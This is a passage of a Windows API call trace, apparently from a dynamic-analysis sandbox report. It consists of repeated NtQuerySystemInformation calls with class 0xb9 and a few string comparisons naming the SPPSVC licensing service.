(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0288.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0288.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0288.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0288.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x20, ResultLength=0x0) [0288.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x20, ResultLength=0x0) [0288.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x50, ResultLength=0x0) [0288.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0288.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0288.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0288.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0288.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0288.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0288.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0288.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0288.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0288.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0288.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0288.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0288.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0288.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0288.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0288.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0288.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd40, Length=0x20, ResultLength=0x0) [0288.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd40, Length=0x20, ResultLength=0x0) [0288.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0288.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0288.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0288.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0288.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0288.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0288.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.744] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0288.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce98, Length=0x50, ResultLength=0x0) [0288.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0288.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0288.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0288.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0288.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x28, ResultLength=0x0) [0288.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0288.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0288.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0288.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0288.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0288.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0288.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0288.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0288.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0288.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0288.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x28, ResultLength=0x0) [0288.755] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0288.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0288.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0288.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0288.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x28, ResultLength=0x0) [0288.756] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0288.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0288.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0288.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0288.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0288.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x28, ResultLength=0x0) [0288.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x28, ResultLength=0x0) [0288.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x28, ResultLength=0x0) [0288.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x28, ResultLength=0x0) [0288.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0288.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0288.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 